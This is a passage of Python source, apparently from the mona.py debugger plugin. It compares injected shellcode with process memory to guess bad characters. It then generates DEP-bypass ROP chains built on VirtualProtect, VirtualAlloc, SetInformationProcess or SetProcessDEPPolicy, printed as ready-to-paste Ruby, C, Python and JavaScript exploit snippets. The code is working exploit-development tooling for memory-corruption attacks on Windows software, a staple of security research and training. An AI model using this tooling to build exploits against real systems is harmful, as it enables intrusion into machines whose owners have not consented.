dx, dy, xchunk, ychunk = c.dx, c.dy, c.xchunk, c.ychunk
if dx < dy: # expansion
# try to apply heuristics for small chunks
if dx <= 10:
res = []
for b in xchunk:
if dx == dy or dy >= 2*dx: break
for value, count in mappings_by_byte[b]:
if tuple(ychunk[:len(value)]) != value: continue
res.append(value)
ychunk = ychunk[len(value):]
dy -= len(value)
break
else:
yield (ychunk[0],)
ychunk = ychunk[1:]
dy -= 1
dx -= 1
for c in res: yield c
# ... or do it the stupid way. If n bytes were changed to m, simply do
# as much drops/expansions as necessary at the beginning and than
# yield the rest of the y chunk as single-byte modifications
for k in range(dy - dx): yield tuple(ychunk[2*k:2*k+2])
ychunk = ychunk[2*(dy - dx):]
elif dx > dy:
for _ in range(dx - dy): yield ()
for b in ychunk: yield (b,)
def read_memory(dbg, location, max_size):
''' read the maximum amount of memory from the given address '''
for i in rrange(max_size + 1, 0):
mem = dbg.readMemory(location, i)
if len(mem) == i:
return mem
# we should never get here, i == 0 should always fulfill the above condition
assert False
def shorten_bytes(bytes, size=8):
if len(bytes) <= size: return bin2hex(bytes)
return '%02x ... %02x' % (ord(bytes[0]), ord(bytes[-1]))
def draw_byte_table(mapping, log, columns=16):
hrspace = 3 * columns - 1
hr = '-'*hrspace
log(' ,' + hr + '.')
log(' |' + ' Comparison results:'.ljust(hrspace) + '|')
log(' |' + hr + '|')
for i, chunk in enumerate(extract_chunks(mapping, columns)):
chunk = list(chunk) # save generator result in a list
src, mapped = zip(*chunk)
values = []
for left, right in zip(src, mapped):
if left == right: values.append('') # byte matches original
elif len(right) == 0: values.append('-1') # byte dropped
elif len(right) == 2: values.append('+1') # byte expanded
else: values.append(bin2hex(right)) # byte modified
line1 = '%3x' % (i * columns) + ' |' + bin2hex(src)
line2 = ' |' + ' '.join(sym.ljust(2) for sym in values)
# highlight lines if a modification was detected - removed, looks bad in WinDBG
#highlight = any(x != y for x, y in chunk)
#for l in (line1, line2):
log(line1.ljust(5 + hrspace) + '| File')
log(line2.ljust(5 + hrspace) + '| Memory')
log(' `' + hr + "'")
def draw_chunk_table(cmp, log):
''' Outputs a table that compares the found memory chunks side-by-side
in input file vs. memory '''
table = [('', '', '', '', 'File', 'Memory', 'Note')]
delims = (' ', ' ', ' ', ' | ', ' | ', ' | ', '')
last_unmodified = cmp.get_last_unmodified_chunk()
for c in cmp.get_chunks():
if c.dy == 0: note = 'missing'
elif c.dx > c.dy: note = 'compacted'
elif c.dx < c.dy: note = 'expanded'
elif c.unmodified: note = 'unmodified!'
else: note = 'corrupted'
table.append((c.i, c.j, c.dx, c.dy, shorten_bytes(c.xchunk), shorten_bytes(c.ychunk), note))
# draw the table
sizes = tuple(max(len(str(c)) for c in col) for col in zip(*table))
for i, row in enumerate(table):
log(''.join(str(x).ljust(size) + delim for x, size, delim in zip(row, sizes, delims)))
if i == 0 or (i == last_unmodified + 1 and i < len(table)):
log('-' * (sum(sizes) + sum(len(d) for d in delims)))
def guess_bad_chars(cmp, log, logsilent):
	''' Tries to guess bad characters and outputs them '''
	guessed_badchars = []
bytes_in_changed_blocks = defaultdict(int)
chunks = cmp.get_chunks()
last_unmodified = cmp.get_last_unmodified_chunk()
for i, c in enumerate(chunks):
if c.unmodified: continue
if i == last_unmodified + 1:
# only report the first character as bad in the final corrupted chunk
bytes_in_changed_blocks[c.xchunk[0]] += 1
break
for b in set(c.xchunk):
bytes_in_changed_blocks[b] += 1
# guess bad chars
likely_bc = [char for char, count in bytes_in_changed_blocks.iteritems() if count > 2]
if likely_bc:
if not logsilent:
log("Very likely bad chars: %s" % bin2hex(sorted(likely_bc)))
guessed_badchars += list(sorted(likely_bc))
if not logsilent:
log("Possibly bad chars: %s" % bin2hex(sorted(bytes_in_changed_blocks)))
guessed_badchars += list(sorted(bytes_in_changed_blocks))
# list bytes already omitted from the input
bytes_omitted_from_input = set(map(chr, range(0, 256))) - set(cmp.x)
if bytes_omitted_from_input:
log("Bytes omitted from input: %s" % bin2hex(sorted(bytes_omitted_from_input)))
guessed_badchars += list(sorted( bytes_omitted_from_input))
# return list, use list(set(..)) to remove dups
return list(set(guessed_badchars))
def memcompare(location, src, comparetable, sctype, smart=True, tablecols=16):
''' Thoroughly compares an input binary string with a location in memory
and outputs the results. '''
# set up logging
objlogfile = MnLog("compare.txt")
logfile = objlogfile.reset(False)
# helpers
def log(msg='', **kw):
msg = str(msg)
dbg.log(msg, address=location, **kw)
objlogfile.write(msg, logfile)
def add_to_table(msg,badbytes = []):
locinfo = MnPointer(location).memLocation()
badbstr = " "
if len(badbytes) > 0:
badbstr = "%s " % bin2hex(sorted(badbytes))
comparetable.add(0, ['0x%08x' % location, msg, badbstr, sctype, locinfo])
objlogfile.write("-" * 100,logfile)
log('[+] Comparing with memory at location : 0x%08x (%s)' % (location,MnPointer(location).memLocation()), highlight=1)
dbg.updateLog()
mem = read_memory(dbg, location, 2*len(src))
if smart:
cmp = MemoryComparator(src, mem)
mapped_chunks = map(''.join, cmp.guess_mapping())
else:
mapped_chunks = list(mem[:len(src)]) + [()] * (len(src) - len(mem))
mapping = zip(src, mapped_chunks)
broken = [(i,x,y) for i,(x,y) in enumerate(mapping) if x != y]
if not broken:
log('!!! Hooray, %s shellcode unmodified !!!' % sctype, focus=1, highlight=1)
add_to_table('Unmodified')
guessed_bc = guess_bad_chars(cmp, log, True)
else:
log("Only %d original bytes of '%s' code found." % (len(src) - len(broken), sctype))
draw_byte_table(mapping, log, columns=tablecols)
log()
guessed_bc = []
if smart:
# print additional analysis
draw_chunk_table(cmp, log)
log()
guessed_bc = guess_bad_chars(cmp, log, False)
log()
add_to_table('Corruption after %d bytes' % broken[0][0],guessed_bc)
#-----------------------------------------------------------------------#
# ROP related functions
#-----------------------------------------------------------------------#
def createRopChains(suggestions,interestinggadgets,allgadgets,modulecriteria,criteria,objprogressfile,progressfile):
"""
Will attempt to produce ROP chains
"""
global ptr_to_get
global ptr_counter
global silent
global noheader
global ignoremodules
#vars
vplogtxt = ""
# RVA ?
showrva = False
if "rva" in criteria:
showrva = True
#define rop routines
routinedefs = {}
routinesetup = {}
virtualprotect = [["esi","api"],["ebp","jmp esp"],["ebx",0x201],["edx",0x40],["ecx","&?W"],["edi","ropnop"],["eax","nop"]]
virtualalloc = [["esi","api"],["ebp","jmp esp"],["ebx",0x01],["edx",0x1000],["ecx",0x40],["edi","ropnop"],["eax","nop"]]
setinformationprocess = [["ebp","api"],["edx",0x22],["ecx","&","0x00000002"],["ebx",0xffffffff],["eax",0x4],["edi","pop"]]
setprocessdeppolicy = [["ebp","api"],["ebx","&","0x00000000"],["edi","pop"]]
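	# each entry is [register, target] : "api" = ptr to the API, "jmp esp" = ptr to a JMP ESP,
	# "ropnop" = ptr to a RETN, "pop" = gadget that skips 4 bytes, "nop" = 0x90909090,
	# "&?W" = ptr to writable memory, "&" = ptr to the literal value that follows, ints = literal values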
routinedefs["VirtualProtect"] = virtualprotect
routinedefs["VirtualAlloc"] = virtualalloc
# only run these on older systems
osver=dbg.getOsVersion()
if not (osver == "6" or osver == "7" or osver == "8" or osver == "vista" or osver == "win7" or osver == "2008server" or osver == "win8"):
routinedefs["SetInformationProcess"] = setinformationprocess
routinedefs["SetProcessDEPPolicy"] = setprocessdeppolicy
modulestosearch = getModulesToQuery(modulecriteria)
routinesetup["VirtualProtect"] = """--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------"""
routinesetup["VirtualAlloc"] = """--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------"""
routinesetup["SetInformationProcess"] = """--------------------------------------------
EAX = SizeOf(ExecuteFlags) (0x4)
ECX = &ExecuteFlags (ptr to 0x00000002)
EDX = ProcessExecuteFlags (0x22)
EBX = NtCurrentProcess (0xffffffff)
ESP = ReturnTo (automatic)
EBP = ptr to NtSetInformationProcess()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------"""
routinesetup["SetProcessDEPPolicy"] = """--------------------------------------------
EAX = <not used>
ECX = <not used>
EDX = <not used>
EBX = dwFlags (ptr to 0x00000000)
ESP = ReturnTo (automatic)
EBP = ptr to SetProcessDEPPolicy()
ESI = <not used>
EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------"""
updatetxt = ""
for routine in routinedefs:
thischain = {}
updatetxt = "Attempting to produce rop chain for %s" % routine
dbg.log("[+] %s" % updatetxt)
objprogressfile.write("- " + updatetxt,progressfile)
vplogtxt += "\n"
vplogtxt += "#" * 80
vplogtxt += "\n\nRegister setup for " + routine + "() :\n" + routinesetup[routine] + "\n\n"
targetOS = "(XP/2003 Server and up)"
if routine == "SetInformationProcess":
targetOS = "(XP/2003 Server only)"
if routine == "SetProcessDEPPolicy":
targetOS = "(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)"
title = "ROP Chain for %s() [%s] :" % (routine,targetOS)
vplogtxt += "\n%s\n" % title
vplogtxt += ("-" * len(title)) + "\n\n"
vplogtxt += "*** [ Ruby ] ***\n\n"
vplogtxt += " def create_rop_chain()\n"
vplogtxt += '\n # rop chain generated with mona.py - www.corelan.be'
vplogtxt += "\n rop_gadgets = \n"
vplogtxt += " [\n"
thischaintxt = ""
dbg.updateLog()
modused = {}
skiplist = []
replacelist = {}
toadd = {}
movetolast = []
regsequences = []
stepcnt = 1
for step in routinedefs[routine]:
thisreg = step[0]
thistarget = step[1]
if thisreg in replacelist:
thistarget = replacelist[thisreg]
thistimestamp=datetime.datetime.now().strftime("%a %Y/%m/%d %I:%M:%S %p")
dbg.log(" %s: Step %d/%d: %s" % (thistimestamp,stepcnt,len(routinedefs[routine]),thisreg))
stepcnt += 1
if not thisreg in skiplist:
regsequences.append(thisreg)
# this must be done first, so we can determine deviations to the chain using
# replacelist and skiplist arrays
if str(thistarget) == "api":
objprogressfile.write(" * Enumerating ROPFunc info",progressfile)
#dbg.log(" Enumerating ROPFunc info")
# routine to put api pointer in thisreg
funcptr,functext = getRopFuncPtr(routine,modulecriteria,criteria,"iat")
if routine == "SetProcessDEPPolicy" and funcptr == 0:
# read EAT
funcptr,functext = getRopFuncPtr(routine,modulecriteria,criteria,"eat")
extra = ""
if funcptr == 0:
extra = "[-] Unable to find ptr to "
thischain[thisreg] = [[0,extra + routine + "() (-> to be put in " + thisreg + ")",0]]
					else:
						# SetInformationProcess / SetProcessDEPPolicy load the function pointer straight
						# into the target register; VirtualProtect / VirtualAlloc use the pickup gadget
						# approach (see getPickupGadget) instead
						if routine == "SetInformationProcess" or routine == "SetProcessDEPPolicy":
							thischain[thisreg] = putValueInReg(thisreg,funcptr,routine + "() [" + MnPointer(funcptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
						else:
							objprogressfile.write(" Function pointer : 0x%x" % funcptr,progressfile)
							objprogressfile.write(" * Getting pickup gadget",progressfile)
							thischain[thisreg],skiplist = getPickupGadget(thisreg,funcptr,functext,suggestions,interestinggadgets,criteria,modulecriteria,routine)
# if skiplist is not empty, then we are using the alternative pickup (via jmp [eax])
# this means we have to make some changes to the routine
# and place this pickup at the end
if len(skiplist) > 0:
if routine.lower() == "virtualprotect" or routine.lower() == "virtualalloc":
replacelist["ebp"] = "pop"
#set up call to finding jmp esp
oldsilent = silent
silent=True
ptr_counter = 0
ptr_to_get = 3
jmpreg = findJMP(modulecriteria,criteria,"esp")
ptr_counter = 0
ptr_to_get = -1
jmpptr = 0
jmptype = ""
silent=oldsilent
total = getNrOfDictElements(jmpreg)
if total > 0:
ptrindex = random.randint(1,total)
indexcnt= 1
for regtype in jmpreg:
for ptr in jmpreg[regtype]:
if indexcnt == ptrindex:
jmpptr = ptr
jmptype = regtype
break
indexcnt += 1
if jmpptr > 0:
toadd[thistarget] = [jmpptr,"ptr to '" + jmptype + "'"]
else:
toadd[thistarget] = [jmpptr,"ptr to 'jmp esp'"]
# make sure the pickup is placed last
movetolast.append(thisreg)
if str(thistarget).startswith("jmp"):
targetreg = str(thistarget).split(" ")[1]
#set up call to finding jmp esp
oldsilent = silent
silent=True
ptr_counter = 0
ptr_to_get = 3
jmpreg = findJMP(modulecriteria,criteria,targetreg)
ptr_counter = 0
ptr_to_get = -1
jmpptr = 0
jmptype = ""
silent=oldsilent
total = getNrOfDictElements(jmpreg)
if total > 0:
ptrindex = random.randint(1,total)
indexcnt= 1
for regtype in jmpreg:
for ptr in jmpreg[regtype]:
if indexcnt == ptrindex:
jmpptr = ptr
jmptype = regtype
break
indexcnt += 1
jmpinfo = ""
if jmpptr == 0:
jmptype = ""
jmpinfo = "Unable to find ptr to 'JMP ESP'"
else:
jmpinfo = MnPointer(jmpptr).belongsTo()
thischain[thisreg] = putValueInReg(thisreg,jmpptr,"& " + jmptype + " [" + jmpinfo + "]",suggestions,interestinggadgets,criteria)
if str(thistarget) == "ropnop":
ropptr = 0
for poptype in suggestions:
if poptype.startswith("pop "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("inc "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("dec "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+1
break
if poptype.startswith("neg "):
for retptr in suggestions[poptype]:
if getOffset(interestinggadgets[retptr]) == 0 and interestinggadgets[retptr].count("#") == 2:
ropptr = retptr+2
break
if ropptr == 0:
for emptytype in suggestions:
if emptytype.startswith("empty "):
for retptr in suggestions[emptytype]:
if interestinggadgets[retptr].startswith("# XOR"):
if getOffset(interestinggadgets[retptr]) == 0:
ropptr = retptr+2
break
if ropptr > 0:
thischain[thisreg] = putValueInReg(thisreg,ropptr,"RETN (ROP NOP) [" + MnPointer(ropptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,ropptr,"[-] Unable to find ptr to RETN (ROP NOP)",suggestions,interestinggadgets,criteria)
if thistarget.__class__.__name__ == "int" or thistarget.__class__.__name__ == "long":
thischain[thisreg] = putValueInReg(thisreg,thistarget,"0x" + toHex(thistarget) + "-> " + thisreg,suggestions,interestinggadgets,criteria)
if str(thistarget) == "nop":
thischain[thisreg] = putValueInReg(thisreg,0x90909090,"nop",suggestions,interestinggadgets,criteria)
if str(thistarget).startswith("&?"):
#pointer to a writable location
rwptr = getAPointer(modulestosearch,criteria,"RW")
if rwptr == 0:
rwptr = getAPointer(modulestosearch,criteria,"W")
if rwptr != 0:
thischain[thisreg] = putValueInReg(thisreg,rwptr,"&Writable location [" + MnPointer(rwptr).belongsTo()+"]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,rwptr,"[-] Unable to find writable location",suggestions,interestinggadgets,criteria)
if str(thistarget).startswith("pop"):
#get distance
if "pop " + thisreg in suggestions:
popptr = getShortestGadget(suggestions["pop "+thisreg])
junksize = getJunk(interestinggadgets[popptr])-4
thismodname = MnPointer(popptr).belongsTo()
thischain[thisreg] = [[popptr,"",junksize],[popptr,"skip 4 bytes [" + thismodname + "]"]]
else:
thischain[thisreg] = [[0,"[-] Couldn't find a gadget to put a pointer to a stackpivot (4 bytes) into "+ thisreg,0]]
if str(thistarget)==("&"):
pattern = step[2]
base = 0
top = TOP_USERLAND
type = "ptr"
al = criteria["accesslevel"]
criteria["accesslevel"] = "R"
ptr_counter = 0
ptr_to_get = 2
oldsilent = silent
silent=True
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
silent = oldsilent
criteria["accesslevel"] = al
if len(allpointers) > 0:
theptr = 0
for ptrtype in allpointers:
for ptrs in allpointers[ptrtype]:
theptr = ptrs
break
thischain[thisreg] = putValueInReg(thisreg,theptr,"&" + str(pattern) + " [" + MnPointer(theptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,0,"[-] Unable to find ptr to " + str(pattern),suggestions,interestinggadgets,criteria)
returnoffset = 0
delayedfill = 0
junksize = 0
# get longest modulename
longestmod = 0
fillersize = 0
for step in routinedefs[routine]:
thisreg = step[0]
if thisreg in thischain:
for gadget in thischain[thisreg]:
thismodname = sanitize_module_name(MnPointer(gadget[0]).belongsTo())
if len(thismodname) > longestmod:
longestmod = len(thismodname)
if showrva:
fillersize = longestmod + 8
else:
fillersize = 0
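# when showrva is set, every gadget is written as "base_<module> + offset" (padded to the longest
# module name) so the generated chain keeps working when the module gets rebased / ASLR'd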
# modify the chain order (regsequences array)
for reg in movetolast:
if reg in regsequences:
regsequences.remove(reg)
regsequences.append(reg)
regimpact = {}
# create the current chain
ropdbchain = ""
tohex_array = []
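# each chain entry is [pointer, text, junksize] : an empty text means the gadget's own
# disassembly is printed, junksize bytes of 0x41 filler are appended, and a gadget ending in
# RETN+n is compensated by adding n filler bytes right after the next entry
# illustrative output line (addresses are examples only) :
# 0x77c12345, # POP EAX # RETN [example.dll]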
for step in regsequences:
thisreg = step
if thisreg in thischain:
for gadget in thischain[thisreg]:
gadgetstep = gadget[0]
steptxt = gadget[1]
junksize = 0
showfills = False
if len(gadget) > 2:
junksize = gadget[2]
if gadgetstep in interestinggadgets and steptxt == "":
thisinstr = interestinggadgets[gadgetstep].lstrip()
if thisinstr.startswith("#"):
thisinstr = thisinstr[2:len(thisinstr)]
showfills = True
thismodname = MnPointer(gadgetstep).belongsTo()
thisinstr += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(sanitize_module_name(thismodname))
vplogtxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
thischaintxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
else:
vplogtxt += " 0x%s, # %s %s\n" % (toHex(gadgetstep),thisinstr,steptxt)
thischaintxt += " 0x%s, # %s %s\n" % (toHex(gadgetstep),thisinstr,steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(gadgetstep-tmod.moduleBase),thisinstr.strip(" "))
tohex_array.append(gadgetstep)
if showfills:
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if returnoffset > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
returnoffset = getOffset(interestinggadgets[gadgetstep])
if delayedfill > 0:
vplogtxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
thischaintxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
delayedfill = 0
if thisinstr.startswith("POP "):
delayedfill = junksize
else:
vplogtxt += createJunk(junksize,"Filler (compensate)",fillersize)
thischaintxt += createJunk(junksize,"Filler (compensate)",fillersize)
if junksize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
else:
# still could be a pointer
thismodname = MnPointer(gadgetstep).belongsTo()
if thismodname != "":
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(sanitize_module_name(thismodname))
vplogtxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),steptxt)
thischaintxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),steptxt)
else:
vplogtxt += " 0x%s, # %s\n" % (toHex(gadgetstep),steptxt)
thischaintxt += " 0x%s, # %s\n" % (toHex(gadgetstep),steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(gadgetstep-tmod.moduleBase),steptxt.strip(" "))
else:
vplogtxt += " 0x%s,%s # %s\n" % (toHex(gadgetstep),toSize("",fillersize),steptxt)
thischaintxt += " 0x%s,%s # %s\n" % (toHex(gadgetstep),toSize("",fillersize),steptxt)
ropdbchain += ' <gadget value="0x%s">%s</gadget>\n' % (toHex(gadgetstep),steptxt.strip(" "))
if steptxt.startswith("[-]"):
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
returnoffset = 0
if delayedfill > 0:
vplogtxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
thischaintxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
delayedfill = 0
vplogtxt += createJunk(junksize,"",fillersize)
thischaintxt += createJunk(junksize,"",fillersize)
if junksize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
# finish it off
steptxt = ""
if "pushad" in suggestions:
shortest_pushad = getShortestGadget(suggestions["pushad"])
junksize = getJunk(interestinggadgets[shortest_pushad])
thisinstr = interestinggadgets[shortest_pushad].lstrip()
if thisinstr.startswith("#"):
thisinstr = thisinstr[2:len(thisinstr)]
regimpact = getRegImpact(thisinstr)
thismodname = MnPointer(shortest_pushad).belongsTo()
thisinstr += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(thismodname)
vplogtxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(shortest_pushad - tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
thischaintxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(shortest_pushad - tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
else:
vplogtxt += " 0x%s, # %s %s\n" % (toHex(shortest_pushad),thisinstr,steptxt)
thischaintxt += " 0x%s, # %s %s\n" % (toHex(shortest_pushad),thisinstr,steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(shortest_pushad-tmod.moduleBase),thisinstr.strip(" "))
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if returnoffset > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
vplogtxt += createJunk(junksize,"",fillersize)
thischaintxt += createJunk(junksize,"",fillersize)
if junksize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
else:
vplogtxt += " 0x00000000,%s # %s\n" % (toSize("",fillersize),"[-] Unable to find pushad gadget")
thischaintxt += " 0x00000000,%s # %s\n" % (toSize("",fillersize),"[-] Unable to find pushad gadget")
ropdbchain += ' <gadget offset="0x00000000">Unable to find PUSHAD gadget</gadget>\n'
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if returnoffset > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
# anything else to add ?
if len(toadd) > 0:
for adds in toadd:
theptr = toadd[adds][0]
freetext = toadd[adds][1]
if theptr > 0:
thismodname = MnPointer(theptr).belongsTo()
freetext += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(thismodname)
vplogtxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(theptr - tmod.moduleBase),toSize("",alignsize),freetext)
thischaintxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(theptr - tmod.moduleBase),toSize("",alignsize),freetext)
else:
vplogtxt += " 0x%s, # %s\n" % (toHex(theptr),freetext)
thischaintxt += " 0x%s, # %s\n" % (toHex(theptr),freetext)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(theptr-tmod.moduleBase),freetext.strip(" "))
else:
vplogtxt += " 0x%s, # <- Unable to find %s\n" % (toHex(theptr),freetext)
thischaintxt += " 0x%s, # <- Unable to find %s\n" % (toHex(theptr),freetext)
ropdbchain += ' <gadget offset="0x%s">Unable to find %s</gadget>\n' % (toHex(theptr),freetext.strip(" "))
vplogtxt += ' ].flatten.pack("V*")\n'
vplogtxt += '\n return rop_gadgets\n\n'
vplogtxt += ' end\n'
vplogtxt += '\n\n # Call the ROP chain generator inside the \'exploit\' function :\n\n'
calltxt = "rop_chain = create_rop_chain("
argtxt = ""
vplogtxtpy = ""
vplogtxtc = ""
vplogtxtjs = ""
argtxtpy = ""
if showrva:
for themod in modused:
repr_mod = sanitize_module_name(themod)
vplogtxt += " # " + modused[themod][1] + "\n"
vplogtxtpy += " # " + modused[themod][1] + "\n"
vplogtxtc += " // " + modused[themod][1] + "\n"
vplogtxtjs += " // " + modused[themod][1] + "\n"
vplogtxt += " base_" + repr_mod + " = 0x%s\n" % toHex(modused[themod][0])
vplogtxtjs += " var base_" + repr_mod + " = 0x%s;\n" % toHex(modused[themod][0])
vplogtxtpy += " base_" + repr_mod + " = 0x%s\n" % toHex(modused[themod][0])
vplogtxtc += " unsigned int base_" + repr_mod + " = 0x%s;\n" % toHex(modused[themod][0])
calltxt += "base_" + repr_mod + ","
argtxt += "base_" + repr_mod + ","
argtxtpy += "base_" + repr_mod + ","
calltxt = calltxt.rstrip(",") + ")\n"
argtxt = argtxt.strip(",")
argtxtpy = argtxtpy.strip(",")
argtxtjs = argtxtpy.replace(".","")
vplogtxt = vplogtxt.replace("create_rop_chain()","create_rop_chain(" + argtxt + ")")
vplogtxt += '\n ' + calltxt
vplogtxt += '\n\n\n'
# C
vplogtxt += "*** [ C ] ***\n\n"
vplogtxt += " #define CREATE_ROP_CHAIN(name, ...) \\\n"
vplogtxt += " int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \\\n"
vplogtxt += " unsigned int name[name##_length / sizeof(unsigned int)]; \\\n"
vplogtxt += " create_rop_chain(name, ##__VA_ARGS__);\n\n"
vplogtxt += " int create_rop_chain(unsigned int *buf, %s)\n" % ", ".join("unsigned int %s" % _ for _ in argtxt.split(","))
vplogtxt += " {\n"
vplogtxt += " // rop chain generated with mona.py - www.corelan.be\n"
vplogtxt += " unsigned int rop_gadgets[] = {\n"
vplogtxt += thischaintxt.replace("#", "//")
vplogtxt += " };\n"
vplogtxt += " if(buf != NULL) {\n"
vplogtxt += " memcpy(buf, rop_gadgets, sizeof(rop_gadgets));\n"
vplogtxt += " };\n"
vplogtxt += " return sizeof(rop_gadgets);\n"
vplogtxt += " }\n\n"
vplogtxt += vplogtxtc
vplogtxt += " // use the 'rop_chain' variable after this call, it's just an unsigned int[]\n"
vplogtxt += " CREATE_ROP_CHAIN(rop_chain, %s);\n" % argtxtpy
vplogtxt += " // alternatively just allocate a large enough buffer and get the rop chain, i.e.:\n"
vplogtxt += " // unsigned int rop_chain[256];\n"
vplogtxt += " // int rop_chain_length = create_rop_chain(rop_chain, %s);\n\n" % argtxtpy
# Python
vplogtxt += "*** [ Python ] ***\n\n"
vplogtxt += " def create_rop_chain(%s):\n" % argtxt
vplogtxt += "\n # rop chain generated with mona.py - www.corelan.be\n"
vplogtxt += " rop_gadgets = [\n"
vplogtxt += thischaintxt
vplogtxt += " ]\n"
vplogtxt += " return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\n\n"
vplogtxt += vplogtxtpy
vplogtxt += " rop_chain = create_rop_chain(%s)\n\n" % argtxtpy
# Javascript
vplogtxt += "\n\n*** [ JavaScript ] ***\n\n"
vplogtxt += " //rop chain generated with mona.py - www.corelan.be\n"
if not showrva:
vplogtxt += " rop_gadgets = unescape(\n"
allptr = thischaintxt.split("\n")
tptrcnt = 0
for tptr in allptr:
comments = tptr.split(",")
comment = ""
if len(comments) > 1:
# add everything
ic = 1
while ic < len(comments):
comment += "," + comments[ic]
ic += 1
tptrcnt += 1
comment = comment.replace(" ","")
if tptrcnt < len(allptr):
vplogtxt += " \"" + toJavaScript(tptr) + "\" + // " + comments[0].replace(" ","").replace(" ","") + " : " + comment + "\n"
else:
vplogtxt += " \"" + toJavaScript(tptr) + "\"); // " + comments[0].replace(" ","").replace(" ","") + " : " + comment + "\n\n"
else:
vplogtxt += " function get_rop_chain(%s) {\n" % argtxtjs
vplogtxt += " var rop_gadgets = [\n"
vplogtxt += thischaintxt.replace(" #"," //").replace(".","")
